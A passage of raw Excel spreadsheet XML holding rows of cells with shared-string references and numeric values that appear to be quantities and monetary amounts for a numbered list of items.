      <c r="Q109" s="47"/>
      <c r="R109" s="47"/>
      <c r="S109" s="47"/>
      <c r="T109" s="47"/>
      <c r="U109" s="47"/>
      <c r="V109" s="47"/>
      <c r="W109" s="47"/>
      <c r="X109" s="47"/>
      <c r="Y109" s="47"/>
      <c r="Z109" s="47"/>
      <c r="AA109" s="47"/>
      <c r="AB109" s="47"/>
      <c r="AC109" s="47"/>
      <c r="AD109" s="47"/>
      <c r="AE109" s="47"/>
      <c r="AF109" s="47"/>
      <c r="AG109" s="47"/>
    </row>
    <row r="110" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A110" s="25"/>
      <c r="B110" s="23">
        <v>219</v>
      </c>
      <c r="C110" s="257" t="s">
        <v>4392</v>
      </c>
      <c r="D110" s="258" t="s">
        <v>4393</v>
      </c>
      <c r="E110" s="258" t="s">
        <v>4394</v>
      </c>
      <c r="F110" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G110" s="36">
        <v>2</v>
      </c>
      <c r="H110" s="257" t="s">
        <v>3566</v>
      </c>
      <c r="I110" s="67">
        <v>933467.76</v>
      </c>
      <c r="J110" s="50">
        <v>172800</v>
      </c>
      <c r="K110" s="259" t="s">
        <v>4395</v>
      </c>
      <c r="L110" s="47"/>
      <c r="M110" s="47"/>
      <c r="N110" s="47"/>
      <c r="O110" s="47"/>
      <c r="P110" s="47"/>
      <c r="Q110" s="47"/>
      <c r="R110" s="47"/>
      <c r="S110" s="47"/>
      <c r="T110" s="47"/>
      <c r="U110" s="47"/>
      <c r="V110" s="47"/>
      <c r="W110" s="47"/>
      <c r="X110" s="47"/>
      <c r="Y110" s="47"/>
      <c r="Z110" s="47"/>
      <c r="AA110" s="47"/>
      <c r="AB110" s="47"/>
      <c r="AC110" s="47"/>
      <c r="AD110" s="47"/>
      <c r="AE110" s="47"/>
      <c r="AF110" s="47"/>
      <c r="AG110" s="47"/>
    </row>
    <row r="111" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A111" s="25"/>
      <c r="B111" s="23">
        <v>220</v>
      </c>
      <c r="C111" s="257" t="s">
        <v>4396</v>
      </c>
      <c r="D111" s="258" t="s">
        <v>4397</v>
      </c>
      <c r="E111" s="258" t="s">
        <v>4398</v>
      </c>
      <c r="F111" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G111" s="36">
        <v>1</v>
      </c>
      <c r="H111" s="257" t="s">
        <v>3582</v>
      </c>
      <c r="I111" s="67">
        <v>401470.62</v>
      </c>
      <c r="J111" s="50">
        <v>169600</v>
      </c>
      <c r="K111" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L111" s="47"/>
      <c r="M111" s="47"/>
      <c r="N111" s="47"/>
      <c r="O111" s="47"/>
      <c r="P111" s="47"/>
      <c r="Q111" s="47"/>
      <c r="R111" s="47"/>
      <c r="S111" s="47"/>
      <c r="T111" s="47"/>
      <c r="U111" s="47"/>
      <c r="V111" s="47"/>
      <c r="W111" s="47"/>
      <c r="X111" s="47"/>
      <c r="Y111" s="47"/>
      <c r="Z111" s="47"/>
      <c r="AA111" s="47"/>
      <c r="AB111" s="47"/>
      <c r="AC111" s="47"/>
      <c r="AD111" s="47"/>
      <c r="AE111" s="47"/>
      <c r="AF111" s="47"/>
      <c r="AG111" s="47"/>
    </row>
    <row r="112" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A112" s="25"/>
      <c r="B112" s="23">
        <v>221</v>
      </c>
      <c r="C112" s="257" t="s">
        <v>4399</v>
      </c>
      <c r="D112" s="258" t="s">
        <v>1011</v>
      </c>
      <c r="E112" s="258" t="s">
        <v>4400</v>
      </c>
      <c r="F112" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G112" s="36">
        <v>1</v>
      </c>
      <c r="H112" s="257" t="s">
        <v>1195</v>
      </c>
      <c r="I112" s="67">
        <v>2649.57</v>
      </c>
      <c r="J112" s="50">
        <v>998.4</v>
      </c>
      <c r="K112" s="259" t="s">
        <v>4401</v>
      </c>
      <c r="L112" s="47"/>
      <c r="M112" s="47"/>
      <c r="N112" s="47"/>
      <c r="O112" s="47"/>
      <c r="P112" s="47"/>
      <c r="Q112" s="47"/>
      <c r="R112" s="47"/>
      <c r="S112" s="47"/>
      <c r="T112" s="47"/>
      <c r="U112" s="47"/>
      <c r="V112" s="47"/>
      <c r="W112" s="47"/>
      <c r="X112" s="47"/>
      <c r="Y112" s="47"/>
      <c r="Z112" s="47"/>
      <c r="AA112" s="47"/>
      <c r="AB112" s="47"/>
      <c r="AC112" s="47"/>
      <c r="AD112" s="47"/>
      <c r="AE112" s="47"/>
      <c r="AF112" s="47"/>
      <c r="AG112" s="47"/>
    </row>
    <row r="113" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A113" s="25"/>
      <c r="B113" s="23">
        <v>222</v>
      </c>
      <c r="C113" s="257" t="s">
        <v>4402</v>
      </c>
      <c r="D113" s="258" t="s">
        <v>4403</v>
      </c>
      <c r="E113" s="258" t="s">
        <v>4404</v>
      </c>
      <c r="F113" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G113" s="36">
        <v>1</v>
      </c>
      <c r="H113" s="257" t="s">
        <v>1195</v>
      </c>
      <c r="I113" s="67">
        <v>4946.58</v>
      </c>
      <c r="J113" s="50">
        <v>1881.6</v>
      </c>
      <c r="K113" s="259" t="s">
        <v>4401</v>
      </c>
      <c r="L113" s="47"/>
      <c r="M113" s="47"/>
      <c r="N113" s="47"/>
      <c r="O113" s="47"/>
      <c r="P113" s="47"/>
      <c r="Q113" s="47"/>
      <c r="R113" s="47"/>
      <c r="S113" s="47"/>
      <c r="T113" s="47"/>
      <c r="U113" s="47"/>
      <c r="V113" s="47"/>
      <c r="W113" s="47"/>
      <c r="X113" s="47"/>
      <c r="Y113" s="47"/>
      <c r="Z113" s="47"/>
      <c r="AA113" s="47"/>
      <c r="AB113" s="47"/>
      <c r="AC113" s="47"/>
      <c r="AD113" s="47"/>
      <c r="AE113" s="47"/>
      <c r="AF113" s="47"/>
      <c r="AG113" s="47"/>
    </row>
    <row r="114" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A114" s="25"/>
      <c r="B114" s="23">
        <v>226</v>
      </c>
      <c r="C114" s="257" t="s">
        <v>4405</v>
      </c>
      <c r="D114" s="258" t="s">
        <v>4406</v>
      </c>
      <c r="E114" s="258" t="s">
        <v>4407</v>
      </c>
      <c r="F114" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G114" s="36">
        <v>4</v>
      </c>
      <c r="H114" s="257" t="s">
        <v>1199</v>
      </c>
      <c r="I114" s="67">
        <v>23931.62</v>
      </c>
      <c r="J114" s="50">
        <v>8832</v>
      </c>
      <c r="K114" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L114" s="25"/>
      <c r="M114" s="25"/>
      <c r="N114" s="47"/>
      <c r="O114" s="47"/>
      <c r="P114" s="47"/>
      <c r="Q114" s="47"/>
      <c r="R114" s="47"/>
      <c r="S114" s="47"/>
      <c r="T114" s="47"/>
      <c r="U114" s="47"/>
      <c r="V114" s="47"/>
      <c r="W114" s="47"/>
      <c r="X114" s="47"/>
      <c r="Y114" s="47"/>
      <c r="Z114" s="47"/>
      <c r="AA114" s="47"/>
      <c r="AB114" s="47"/>
      <c r="AC114" s="47"/>
      <c r="AD114" s="47"/>
      <c r="AE114" s="47"/>
      <c r="AF114" s="47"/>
      <c r="AG114" s="47"/>
    </row>
    <row r="115" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A115" s="25"/>
      <c r="B115" s="23">
        <v>227</v>
      </c>
      <c r="C115" s="257" t="s">
        <v>4408</v>
      </c>
      <c r="D115" s="258" t="s">
        <v>4409</v>
      </c>
      <c r="E115" s="66"/>
      <c r="F115" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G115" s="36">
        <v>1</v>
      </c>
      <c r="H115" s="257" t="s">
        <v>1203</v>
      </c>
      <c r="I115" s="67">
        <v>6546.26</v>
      </c>
      <c r="J115" s="50">
        <v>2240</v>
      </c>
      <c r="K115" s="259" t="s">
        <v>1784</v>
      </c>
      <c r="L115" s="25"/>
      <c r="M115" s="25"/>
      <c r="N115" s="47"/>
      <c r="O115" s="47"/>
      <c r="P115" s="47"/>
      <c r="Q115" s="47"/>
      <c r="R115" s="47"/>
      <c r="S115" s="47"/>
      <c r="T115" s="47"/>
      <c r="U115" s="47"/>
      <c r="V115" s="47"/>
      <c r="W115" s="47"/>
      <c r="X115" s="47"/>
      <c r="Y115" s="47"/>
      <c r="Z115" s="47"/>
      <c r="AA115" s="47"/>
      <c r="AB115" s="47"/>
      <c r="AC115" s="47"/>
      <c r="AD115" s="47"/>
      <c r="AE115" s="47"/>
      <c r="AF115" s="47"/>
      <c r="AG115" s="47"/>
    </row>
    <row r="116" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A116" s="25"/>
      <c r="B116" s="23">
        <v>228</v>
      </c>
      <c r="C116" s="257" t="s">
        <v>4410</v>
      </c>
      <c r="D116" s="258" t="s">
        <v>4411</v>
      </c>
      <c r="E116" s="66"/>
      <c r="F116" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G116" s="36">
        <v>1</v>
      </c>
      <c r="H116" s="257" t="s">
        <v>1203</v>
      </c>
      <c r="I116" s="67">
        <v>19100</v>
      </c>
      <c r="J116" s="50">
        <v>8064</v>
      </c>
      <c r="K116" s="259" t="s">
        <v>1784</v>
      </c>
      <c r="L116" s="25"/>
      <c r="M116" s="25"/>
      <c r="N116" s="47"/>
      <c r="O116" s="47"/>
      <c r="P116" s="47"/>
      <c r="Q116" s="47"/>
      <c r="R116" s="47"/>
      <c r="S116" s="47"/>
      <c r="T116" s="47"/>
      <c r="U116" s="47"/>
      <c r="V116" s="47"/>
      <c r="W116" s="47"/>
      <c r="X116" s="47"/>
      <c r="Y116" s="47"/>
      <c r="Z116" s="47"/>
      <c r="AA116" s="47"/>
      <c r="AB116" s="47"/>
      <c r="AC116" s="47"/>
      <c r="AD116" s="47"/>
      <c r="AE116" s="47"/>
      <c r="AF116" s="47"/>
      <c r="AG116" s="47"/>
    </row>
    <row r="117" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A117" s="25"/>
      <c r="B117" s="23">
        <v>229</v>
      </c>
      <c r="C117" s="257" t="s">
        <v>4412</v>
      </c>
      <c r="D117" s="258" t="s">
        <v>4413</v>
      </c>
      <c r="E117" s="258" t="s">
        <v>4414</v>
      </c>
      <c r="F117" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G117" s="36">
        <v>1</v>
      </c>
      <c r="H117" s="257" t="s">
        <v>2712</v>
      </c>
      <c r="I117" s="67">
        <v>37606.84</v>
      </c>
      <c r="J117" s="50">
        <v>18200</v>
      </c>
      <c r="K117" s="259" t="s">
        <v>4415</v>
      </c>
      <c r="L117" s="25"/>
      <c r="M117" s="25"/>
      <c r="N117" s="47"/>
      <c r="O117" s="47"/>
      <c r="P117" s="47"/>
      <c r="Q117" s="47"/>
      <c r="R117" s="47"/>
      <c r="S117" s="47"/>
      <c r="T117" s="47"/>
      <c r="U117" s="47"/>
      <c r="V117" s="47"/>
      <c r="W117" s="47"/>
      <c r="X117" s="47"/>
      <c r="Y117" s="47"/>
      <c r="Z117" s="47"/>
      <c r="AA117" s="47"/>
      <c r="AB117" s="47"/>
      <c r="AC117" s="47"/>
      <c r="AD117" s="47"/>
      <c r="AE117" s="47"/>
      <c r="AF117" s="47"/>
      <c r="AG117" s="47"/>
    </row>
    <row r="118" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A118" s="25"/>
      <c r="B118" s="23">
        <v>230</v>
      </c>
      <c r="C118" s="257" t="s">
        <v>4416</v>
      </c>
      <c r="D118" s="258" t="s">
        <v>4417</v>
      </c>
      <c r="E118" s="258" t="s">
        <v>4418</v>
      </c>
      <c r="F118" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G118" s="36">
        <v>1</v>
      </c>
      <c r="H118" s="257" t="s">
        <v>4419</v>
      </c>
      <c r="I118" s="67">
        <v>17094.02</v>
      </c>
      <c r="J118" s="50">
        <v>13000</v>
      </c>
      <c r="K118" s="259" t="s">
        <v>4420</v>
      </c>
      <c r="L118" s="25"/>
      <c r="M118" s="25"/>
      <c r="N118" s="47"/>
      <c r="O118" s="47"/>
      <c r="P118" s="47"/>
      <c r="Q118" s="47"/>
      <c r="R118" s="47"/>
      <c r="S118" s="47"/>
      <c r="T118" s="47"/>
      <c r="U118" s="47"/>
      <c r="V118" s="47"/>
      <c r="W118" s="47"/>
      <c r="X118" s="47"/>
      <c r="Y118" s="47"/>
      <c r="Z118" s="47"/>
      <c r="AA118" s="47"/>
      <c r="AB118" s="47"/>
      <c r="AC118" s="47"/>
      <c r="AD118" s="47"/>
      <c r="AE118" s="47"/>
      <c r="AF118" s="47"/>
      <c r="AG118" s="47"/>
    </row>
    <row r="119" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A119" s="25"/>
      <c r="B119" s="23">
        <v>231</v>
      </c>
      <c r="C119" s="257" t="s">
        <v>4421</v>
      </c>
      <c r="D119" s="258" t="s">
        <v>4422</v>
      </c>
      <c r="E119" s="258" t="s">
        <v>4423</v>
      </c>
      <c r="F119" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G119" s="36">
        <v>5</v>
      </c>
      <c r="H119" s="257" t="s">
        <v>3610</v>
      </c>
      <c r="I119" s="67">
        <v>111111.12</v>
      </c>
      <c r="J119" s="50">
        <v>44800</v>
      </c>
      <c r="K119" s="259" t="s">
        <v>4424</v>
      </c>
      <c r="L119" s="47"/>
      <c r="M119" s="47"/>
      <c r="N119" s="47"/>
      <c r="O119" s="47"/>
      <c r="P119" s="47"/>
      <c r="Q119" s="47"/>
      <c r="R119" s="47"/>
      <c r="S119" s="47"/>
      <c r="T119" s="47"/>
      <c r="U119" s="47"/>
      <c r="V119" s="47"/>
      <c r="W119" s="47"/>
      <c r="X119" s="47"/>
      <c r="Y119" s="47"/>
      <c r="Z119" s="47"/>
      <c r="AA119" s="47"/>
      <c r="AB119" s="47"/>
      <c r="AC119" s="47"/>
      <c r="AD119" s="47"/>
      <c r="AE119" s="47"/>
      <c r="AF119" s="47"/>
      <c r="AG119" s="47"/>
    </row>
    <row r="120" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A120" s="25"/>
      <c r="B120" s="23">
        <v>232</v>
      </c>
      <c r="C120" s="257" t="s">
        <v>4425</v>
      </c>
      <c r="D120" s="258" t="s">
        <v>331</v>
      </c>
      <c r="E120" s="258" t="s">
        <v>4426</v>
      </c>
      <c r="F120" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G120" s="36">
        <v>1</v>
      </c>
      <c r="H120" s="257" t="s">
        <v>1475</v>
      </c>
      <c r="I120" s="67">
        <v>3205.13</v>
      </c>
      <c r="J120" s="50">
        <v>1560</v>
      </c>
      <c r="K120" s="259" t="s">
        <v>4427</v>
      </c>
      <c r="L120" s="47"/>
      <c r="M120" s="47"/>
      <c r="N120" s="47"/>
      <c r="O120" s="47"/>
      <c r="P120" s="47"/>
      <c r="Q120" s="47"/>
      <c r="R120" s="47"/>
      <c r="S120" s="47"/>
      <c r="T120" s="47"/>
      <c r="U120" s="47"/>
      <c r="V120" s="47"/>
      <c r="W120" s="47"/>
      <c r="X120" s="47"/>
      <c r="Y120" s="47"/>
      <c r="Z120" s="47"/>
      <c r="AA120" s="47"/>
      <c r="AB120" s="47"/>
      <c r="AC120" s="47"/>
      <c r="AD120" s="47"/>
      <c r="AE120" s="47"/>
      <c r="AF120" s="47"/>
      <c r="AG120" s="47"/>
    </row>
    <row r="121" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A121" s="25"/>
      <c r="B121" s="23">
        <v>233</v>
      </c>
      <c r="C121" s="257" t="s">
        <v>4428</v>
      </c>
      <c r="D121" s="258" t="s">
        <v>331</v>
      </c>
      <c r="E121" s="258" t="s">
        <v>4429</v>
      </c>
      <c r="F121" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G121" s="36">
        <v>1</v>
      </c>
      <c r="H121" s="257" t="s">
        <v>1475</v>
      </c>
      <c r="I121" s="67">
        <v>11111.11</v>
      </c>
      <c r="J121" s="50">
        <v>5720</v>
      </c>
      <c r="K121" s="259" t="s">
        <v>4427</v>
      </c>
      <c r="L121" s="25"/>
      <c r="M121" s="25"/>
      <c r="N121" s="47"/>
      <c r="O121" s="47"/>
      <c r="P121" s="47"/>
      <c r="Q121" s="47"/>
      <c r="R121" s="47"/>
      <c r="S121" s="47"/>
      <c r="T121" s="47"/>
      <c r="U121" s="47"/>
      <c r="V121" s="47"/>
      <c r="W121" s="47"/>
      <c r="X121" s="47"/>
      <c r="Y121" s="47"/>
      <c r="Z121" s="47"/>
      <c r="AA121" s="47"/>
      <c r="AB121" s="47"/>
      <c r="AC121" s="47"/>
      <c r="AD121" s="47"/>
      <c r="AE121" s="47"/>
      <c r="AF121" s="47"/>
      <c r="AG121" s="47"/>
    </row>
    <row r="122" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A122" s="25"/>
      <c r="B122" s="23">
        <v>236</v>
      </c>
      <c r="C122" s="257" t="s">
        <v>4430</v>
      </c>
      <c r="D122" s="258" t="s">
        <v>1152</v>
      </c>
      <c r="E122" s="258" t="s">
        <v>4431</v>
      </c>
      <c r="F122" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G122" s="36">
        <v>1</v>
      </c>
      <c r="H122" s="257" t="s">
        <v>4432</v>
      </c>
      <c r="I122" s="67">
        <v>2256.41</v>
      </c>
      <c r="J122" s="50">
        <v>1040</v>
      </c>
      <c r="K122" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L122" s="25"/>
      <c r="M122" s="25"/>
      <c r="N122" s="47"/>
      <c r="O122" s="47"/>
      <c r="P122" s="47"/>
      <c r="Q122" s="47"/>
      <c r="R122" s="47"/>
      <c r="S122" s="47"/>
      <c r="T122" s="47"/>
      <c r="U122" s="47"/>
      <c r="V122" s="47"/>
      <c r="W122" s="47"/>
      <c r="X122" s="47"/>
      <c r="Y122" s="47"/>
      <c r="Z122" s="47"/>
      <c r="AA122" s="47"/>
      <c r="AB122" s="47"/>
      <c r="AC122" s="47"/>
      <c r="AD122" s="47"/>
      <c r="AE122" s="47"/>
      <c r="AF122" s="47"/>
      <c r="AG122" s="47"/>
    </row>
    <row r="123" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A123" s="25"/>
      <c r="B123" s="23">
        <v>237</v>
      </c>
      <c r="C123" s="257" t="s">
        <v>4433</v>
      </c>
      <c r="D123" s="258" t="s">
        <v>4422</v>
      </c>
      <c r="E123" s="258" t="s">
        <v>4423</v>
      </c>
      <c r="F123" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G123" s="36">
        <v>5</v>
      </c>
      <c r="H123" s="257" t="s">
        <v>4432</v>
      </c>
      <c r="I123" s="67">
        <v>89743.59</v>
      </c>
      <c r="J123" s="50">
        <v>53600</v>
      </c>
      <c r="K123" s="259" t="s">
        <v>4434</v>
      </c>
      <c r="L123" s="25"/>
      <c r="M123" s="25"/>
      <c r="N123" s="47"/>
      <c r="O123" s="47"/>
      <c r="P123" s="47"/>
      <c r="Q123" s="47"/>
      <c r="R123" s="47"/>
      <c r="S123" s="47"/>
      <c r="T123" s="47"/>
      <c r="U123" s="47"/>
      <c r="V123" s="47"/>
      <c r="W123" s="47"/>
      <c r="X123" s="47"/>
      <c r="Y123" s="47"/>
      <c r="Z123" s="47"/>
      <c r="AA123" s="47"/>
      <c r="AB123" s="47"/>
      <c r="AC123" s="47"/>
      <c r="AD123" s="47"/>
      <c r="AE123" s="47"/>
      <c r="AF123" s="47"/>
      <c r="AG123" s="47"/>
    </row>
    <row r="124" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A124" s="25"/>
      <c r="B124" s="23">
        <v>240</v>
      </c>
      <c r="C124" s="257" t="s">
        <v>4435</v>
      </c>
      <c r="D124" s="258" t="s">
        <v>2440</v>
      </c>
      <c r="E124" s="258" t="s">
        <v>4436</v>
      </c>
      <c r="F124" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G124" s="36">
        <v>1</v>
      </c>
      <c r="H124" s="257" t="s">
        <v>3627</v>
      </c>
      <c r="I124" s="67">
        <v>2991.45</v>
      </c>
      <c r="J124" s="50">
        <v>1160</v>
      </c>
      <c r="K124" s="259" t="s">
        <v>4437</v>
      </c>
      <c r="L124" s="25"/>
      <c r="M124" s="25"/>
      <c r="N124" s="47"/>
      <c r="O124" s="47"/>
      <c r="P124" s="47"/>
      <c r="Q124" s="47"/>
      <c r="R124" s="47"/>
      <c r="S124" s="47"/>
      <c r="T124" s="47"/>
      <c r="U124" s="47"/>
      <c r="V124" s="47"/>
      <c r="W124" s="47"/>
      <c r="X124" s="47"/>
      <c r="Y124" s="47"/>
      <c r="Z124" s="47"/>
      <c r="AA124" s="47"/>
      <c r="AB124" s="47"/>
      <c r="AC124" s="47"/>
      <c r="AD124" s="47"/>
      <c r="AE124" s="47"/>
      <c r="AF124" s="47"/>
      <c r="AG124" s="47"/>
    </row>
    <row r="125" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A125" s="25"/>
      <c r="B125" s="23">
        <v>241</v>
      </c>
      <c r="C125" s="257" t="s">
        <v>4438</v>
      </c>
      <c r="D125" s="258" t="s">
        <v>4439</v>
      </c>
      <c r="E125" s="66"/>
      <c r="F125" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G125" s="36">
        <v>8</v>
      </c>
      <c r="H125" s="257" t="s">
        <v>729</v>
      </c>
      <c r="I125" s="67">
        <v>53000</v>
      </c>
      <c r="J125" s="50">
        <v>27136</v>
      </c>
      <c r="K125" s="259" t="s">
        <v>4440</v>
      </c>
      <c r="L125" s="25"/>
      <c r="M125" s="25"/>
      <c r="N125" s="47"/>
      <c r="O125" s="47"/>
      <c r="P125" s="47"/>
      <c r="Q125" s="47"/>
      <c r="R125" s="47"/>
      <c r="S125" s="47"/>
      <c r="T125" s="47"/>
      <c r="U125" s="47"/>
      <c r="V125" s="47"/>
      <c r="W125" s="47"/>
      <c r="X125" s="47"/>
      <c r="Y125" s="47"/>
      <c r="Z125" s="47"/>
      <c r="AA125" s="47"/>
      <c r="AB125" s="47"/>
      <c r="AC125" s="47"/>
      <c r="AD125" s="47"/>
      <c r="AE125" s="47"/>
      <c r="AF125" s="47"/>
      <c r="AG125" s="47"/>
    </row>
    <row r="126" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A126" s="25"/>
      <c r="B126" s="23">
        <v>244</v>
      </c>
      <c r="C126" s="257" t="s">
        <v>4441</v>
      </c>
      <c r="D126" s="258" t="s">
        <v>4442</v>
      </c>
      <c r="E126" s="258" t="s">
        <v>4443</v>
      </c>
      <c r="F126" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G126" s="36">
        <v>1</v>
      </c>
      <c r="H126" s="257" t="s">
        <v>3655</v>
      </c>
      <c r="I126" s="67">
        <v>4102.56</v>
      </c>
      <c r="J126" s="50">
        <v>2144</v>
      </c>
      <c r="K126" s="259" t="s">
        <v>4444</v>
      </c>
      <c r="L126" s="25"/>
      <c r="M126" s="25"/>
      <c r="N126" s="47"/>
      <c r="O126" s="47"/>
      <c r="P126" s="47"/>
      <c r="Q126" s="47"/>
      <c r="R126" s="47"/>
      <c r="S126" s="47"/>
      <c r="T126" s="47"/>
      <c r="U126" s="47"/>
      <c r="V126" s="47"/>
      <c r="W126" s="47"/>
      <c r="X126" s="47"/>
      <c r="Y126" s="47"/>
      <c r="Z126" s="47"/>
      <c r="AA126" s="47"/>
      <c r="AB126" s="47"/>
      <c r="AC126" s="47"/>
      <c r="AD126" s="47"/>
      <c r="AE126" s="47"/>
      <c r="AF126" s="47"/>
      <c r="AG126" s="47"/>
    </row>
    <row r="127" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A127" s="25"/>
      <c r="B127" s="23">
        <v>245</v>
      </c>
      <c r="C127" s="257" t="s">
        <v>4445</v>
      </c>
      <c r="D127" s="258" t="s">
        <v>4446</v>
      </c>
      <c r="E127" s="258" t="s">
        <v>4447</v>
      </c>
      <c r="F127" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G127" s="36">
        <v>1</v>
      </c>
      <c r="H127" s="257" t="s">
        <v>3655</v>
      </c>
      <c r="I127" s="67">
        <v>22222.22</v>
      </c>
      <c r="J127" s="50">
        <v>11200</v>
      </c>
      <c r="K127" s="259" t="s">
        <v>4448</v>
      </c>
      <c r="L127" s="25"/>
      <c r="M127" s="25"/>
      <c r="N127" s="47"/>
      <c r="O127" s="47"/>
      <c r="P127" s="47"/>
      <c r="Q127" s="47"/>
      <c r="R127" s="47"/>
      <c r="S127" s="47"/>
      <c r="T127" s="47"/>
      <c r="U127" s="47"/>
      <c r="V127" s="47"/>
      <c r="W127" s="47"/>
      <c r="X127" s="47"/>
      <c r="Y127" s="47"/>
      <c r="Z127" s="47"/>
      <c r="AA127" s="47"/>
      <c r="AB127" s="47"/>
      <c r="AC127" s="47"/>
      <c r="AD127" s="47"/>
      <c r="AE127" s="47"/>
      <c r="AF127" s="47"/>
      <c r="AG127" s="47"/>
    </row>
    <row r="128" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A128" s="25"/>
      <c r="B128" s="23">
        <v>246</v>
      </c>
      <c r="C128" s="257" t="s">
        <v>4449</v>
      </c>
      <c r="D128" s="258" t="s">
        <v>4450</v>
      </c>
      <c r="E128" s="258" t="s">
        <v>4451</v>
      </c>
      <c r="F128" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G128" s="36">
        <v>1</v>
      </c>
      <c r="H128" s="257" t="s">
        <v>780</v>
      </c>
      <c r="I128" s="67">
        <v>6452.99</v>
      </c>
      <c r="J128" s="50">
        <v>2880</v>
      </c>
      <c r="K128" s="259" t="s">
        <v>4452</v>
      </c>
      <c r="L128" s="25"/>
      <c r="M128" s="25"/>
      <c r="N128" s="47"/>
      <c r="O128" s="47"/>
      <c r="P128" s="47"/>
      <c r="Q128" s="47"/>
      <c r="R128" s="47"/>
      <c r="S128" s="47"/>
      <c r="T128" s="47"/>
      <c r="U128" s="47"/>
      <c r="V128" s="47"/>
      <c r="W128" s="47"/>
      <c r="X128" s="47"/>
      <c r="Y128" s="47"/>
      <c r="Z128" s="47"/>
      <c r="AA128" s="47"/>
      <c r="AB128" s="47"/>
      <c r="AC128" s="47"/>
      <c r="AD128" s="47"/>
      <c r="AE128" s="47"/>
      <c r="AF128" s="47"/>
      <c r="AG128" s="47"/>
    </row>
    <row r="129" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A129" s="25"/>
      <c r="B129" s="23">
        <v>250</v>
      </c>
      <c r="C129" s="257" t="s">
        <v>4453</v>
      </c>
      <c r="D129" s="258" t="s">
        <v>4454</v>
      </c>
      <c r="E129" s="258" t="s">
        <v>4455</v>
      </c>
      <c r="F129" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G129" s="36">
        <v>1</v>
      </c>
      <c r="H129" s="257" t="s">
        <v>462</v>
      </c>
      <c r="I129" s="67">
        <v>170940.18</v>
      </c>
      <c r="J129" s="50">
        <v>92160</v>
      </c>
      <c r="K129" s="259" t="s">
        <v>4456</v>
      </c>
      <c r="L129" s="25"/>
      <c r="M129" s="25"/>
      <c r="N129" s="47"/>
      <c r="O129" s="47"/>
      <c r="P129" s="47"/>
      <c r="Q129" s="47"/>
      <c r="R129" s="47"/>
      <c r="S129" s="47"/>
      <c r="T129" s="47"/>
      <c r="U129" s="47"/>
      <c r="V129" s="47"/>
      <c r="W129" s="47"/>
      <c r="X129" s="47"/>
      <c r="Y129" s="47"/>
      <c r="Z129" s="47"/>
      <c r="AA129" s="47"/>
      <c r="AB129" s="47"/>
      <c r="AC129" s="47"/>
      <c r="AD129" s="47"/>
      <c r="AE129" s="47"/>
      <c r="AF129" s="47"/>
      <c r="AG129" s="47"/>
    </row>
    <row r="130" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A130" s="25"/>
      <c r="B130" s="23">
        <v>251</v>
      </c>
      <c r="C130" s="257" t="s">
        <v>4457</v>
      </c>
      <c r="D130" s="258" t="s">
        <v>4454</v>
      </c>
      <c r="E130" s="258" t="s">
        <v>4455</v>
      </c>
      <c r="F130" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G130" s="36">
        <v>1</v>
      </c>
      <c r="H130" s="257" t="s">
        <v>462</v>
      </c>
      <c r="I130" s="67">
        <v>168376.08</v>
      </c>
      <c r="J130" s="50">
        <v>92160</v>
      </c>
      <c r="K130" s="259" t="s">
        <v>4458</v>
      </c>
      <c r="L130" s="25"/>
      <c r="M130" s="25"/>
      <c r="N130" s="47"/>
      <c r="O130" s="47"/>
      <c r="P130" s="47"/>
      <c r="Q130" s="47"/>
      <c r="R130" s="47"/>
      <c r="S130" s="47"/>
      <c r="T130" s="47"/>
      <c r="U130" s="47"/>
      <c r="V130" s="47"/>
      <c r="W130" s="47"/>
      <c r="X130" s="47"/>
      <c r="Y130" s="47"/>
      <c r="Z130" s="47"/>
      <c r="AA130" s="47"/>
      <c r="AB130" s="47"/>
      <c r="AC130" s="47"/>
      <c r="AD130" s="47"/>
      <c r="AE130" s="47"/>
      <c r="AF130" s="47"/>
      <c r="AG130" s="47"/>
    </row>
    <row r="131" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A131" s="25"/>
      <c r="B131" s="23">
        <v>254</v>
      </c>
      <c r="C131" s="257" t="s">
        <v>4459</v>
      </c>
      <c r="D131" s="258" t="s">
        <v>4460</v>
      </c>
      <c r="E131" s="258" t="s">
        <v>1288</v>
      </c>
